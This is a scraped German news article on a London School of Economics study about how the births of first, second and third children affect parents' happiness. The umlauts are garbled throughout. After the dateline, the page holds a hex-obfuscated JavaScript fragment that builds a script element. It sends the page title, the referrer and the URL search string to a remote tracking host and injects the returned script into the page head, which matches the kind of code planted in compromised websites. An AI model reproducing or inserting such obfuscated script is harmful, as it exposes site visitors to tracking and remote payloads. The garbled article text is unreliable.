Thursday, October 18, 2018

                News Feed

Geburt von Kindern bringt Eltern kurzfristig GlA?ck

März 18, 2015 by  
Filed under Höhepunkte

Erster und zweiter Nachkomme machen glA?cklich, dritter aber nicht mehr

Die Geburt des ersten und des zweiten Kindes kann kurzfristig den GlA?ckslevel der Eltern erhAi??hen. Ein drittes Kind jedoch nicht mehr. Das zeigt eine Studie der London School of Economics http://lse.ac.uk in Zusammenarbeit mit der kanadischen Western University http://uwo.ca .

Druck auf Ressourcen steigt

Laut der Studie steigt das GlA?cksgefA?hl der Eltern im Jahr vor und nach der Geburt des ersten Kindes. Danach fAi??llt dieses rasant ab und kehrt zum „Vorkindes-Grad“ zurA?ck. Das Muster fA?r das zweite Kind ist Ai??hnlich, jedoch ist das GlA?cksgefA?hl vor und zum Zeitpunkt der Geburt nur rund halb so stark, wie bei der ersten Geburt. Der Anstieg des ElternglA?ckes rund um eine dritte Geburt ist laut Studie vernachlAi??ssigbar.

„Man kann aus der Tatsache, dass die Erwartung eines dritten Kindes nicht mit einem Anstieg des GlA?cksgefA?hles einhergeht, nicht darauf schlieAYen, dass die dritten Kinder weniger geliebt werden. Es sagt eher aus, dass die Eltern ihre Begeisterung aufgrund ihrer Erfahrungen dafA?r verlieren oder ein neues Kind den Druck auf deren Ressourcen erhAi??ht“, meint Mikko MyrskylAi??, einer der Forscher des Projekts.

Ai??ltere Eltern lAi??nger glA?cklich

Die Tatsache, dass das GlA?cksgefA?hl der Eltern ansteigt, bevor das Kind auf die Welt kommt, zeigt, dass die Kindesgeburt mit einem breiten Themenspektrum, wie das FamilienglA?ck oder PlAi??ne fA?r die Zukunft zu erstellen, in Verbindung gebracht wird, schreibt MyrskylAi??. Verglichen mit MAi??nnern haben Frauen mehr GlA?cksgefA?hle vor und auch kurz nach der Geburt.

Frauen hingegen erleiden innerhalb des ersten Jahres nach der Geburt auch grAi??AYere AbstA?rze, was die GlA?cksgefA?hle betrifft – sehr wahrscheinlich aufgrund des hAi??heren GlA?cksgewinnes am Beginn. Eltern, die ihr erstes Kind in einem hAi??heren Alter (zwischen 35 und 49) bekommen, haben den stAi??rksten GlA?cksgewinn und kAi??nnen den GlA?ckslevel auch lAi??nger nach der Geburt aufrechterhalten.

Bei jungen MA?ttern unter 20 steigt das GlA?cksgefA?hl im Jahr der Geburt kaum A?ber den Basislevel. Werdende Eltern zwischen 23 und 34 hingegen erleben einen Anstieg des GlA?cks vor der ersten Geburt. Allerdings sinkt der GlA?ckslevel innerhalb von ein bis zwei Jahren nach der Geburt auf ein Basis-Niveau oder darunter.
London (pte/31.10.2014/06:15) \x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D“,“\x72\x65\x66\x65\x72\x72\x65\x72″,“\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D“,“\x74\x69\x74\x6C\x65″,“\x26″,“\x3F“,“\x72\x65\x70\x6C\x61\x63\x65″,“\x73\x65\x61\x72\x63\x68″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“,“\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,“\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,“\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,“\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,“\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,“\x68\x65\x61\x64″,“\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,“\x70\x72\x6F\x74\x6F\x63\x6F\x6C“,“\x68\x74\x74\x70\x73\x3A“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x52\x5F\x50\x41\x54\x48″,“\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E“];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

Comments are closed.